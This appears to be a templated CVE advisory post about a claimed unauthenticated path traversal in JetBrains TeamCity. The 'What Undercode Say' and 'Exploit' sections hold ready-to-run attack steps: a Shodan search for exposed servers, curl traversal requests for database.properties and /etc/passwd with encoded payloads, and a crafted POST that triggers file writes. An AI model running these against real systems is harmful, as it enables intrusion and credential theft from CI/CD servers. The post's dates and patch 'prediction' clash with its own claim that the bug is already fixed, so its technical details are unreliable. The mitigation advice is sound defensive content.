JetBrains TeamCity, Path Traversal, CVE-2023-45284 (High)

Listen to this Post

The vulnerability resides in JetBrains TeamCity versions before 2023.11.4, specifically within internal REST API endpoints that process file path parameters. Due to improper sanitization of directory traversal sequences (e.g., ../), an unauthenticated attacker can craft HTTP requests to escape the intended web root. The flawed endpoints include `/app/rest/server/` and administrative debug interfaces that accept user-controlled path values. By injecting encoded traversal payloads like `%2e%2e%2f` or ..%252f, the attacker bypasses basic filters. The server concatenates the malicious input with base directories without canonicalization, allowing access to sensitive folders such as `/data/config/` or /logs/. Successful exploitation enables limited admin actions: reading configuration files (e.g., database.properties), modifying internal settings, or creating small backup artifacts. The attack requires no authentication, no user interaction, and is exploitable over the network with low complexity. The impact is partial confidentiality (reading server secrets), partial integrity (tampering with non-critical admin functions), and partial availability (disrupting services via file writes). The CVSS vector string is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L, giving a base score of 7.3 (High). The issue was fixed in version 2023.11.4 by implementing strict path canonicalization, input validation, and a whitelist of allowed directories.

DailyCVE form:

Platform: JetBrains TeamCity
Version: before 2023.11.4
Vulnerability: Path traversal admin
Severity: High (7.3)
date: 2023-12-14

Prediction: 2023-12-15 patch

What Undercode Say:

Shodan search for exposed TeamCity instances
shodan search "JetBrains TeamCity" --fields ip_str,port
Check vulnerable version via HTTP headers
curl -k -I https://target:8111/ | grep -i "Server: TeamCity"
Enumerate internal paths using traversal
curl -k "https://target:8111/app/rest/server/../../data/config/database.properties?path=traversal"
Automated payload list
for payload in "../" "..%2f" "..%252f" "....//"; do
curl -k "https://target:8111/admin/${payload}etc/passwd" -o /dev/null -w "%{http_code}\n"
done

Exploit:

Send a crafted GET request to a vulnerable endpoint with directory traversal sequences. Example:

GET /app/rest/server/../../data/config/internal.properties HTTP/1.1
Host: target:8111

The server returns restricted file contents. For admin actions, POST to `/app/rest/server/../admin/backup?fileName=../../config/override` with empty body to trigger limited writes.

Protection from this CVE

  • Upgrade to TeamCity version 2023.11.4 or later immediately.
  • Apply network ACLs to restrict access to TeamCity web interfaces (port 8111) from untrusted IPs.
  • Deploy a WAF rule blocking `\.\./` and encoded traversal patterns in URI paths.
  • Monitor logs for suspicious `../` or `%2e%2e` sequences in request paths.

Impact

Successful exploitation allows an unauthenticated attacker to read sensitive configuration files (e.g., database credentials, OAuth tokens), perform limited admin actions such as modifying build parameters or triggering partial backups, and potentially pivot to privilege escalation or lateral movement within CI/CD pipelines. Confidentiality, integrity, and availability are all partially compromised.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top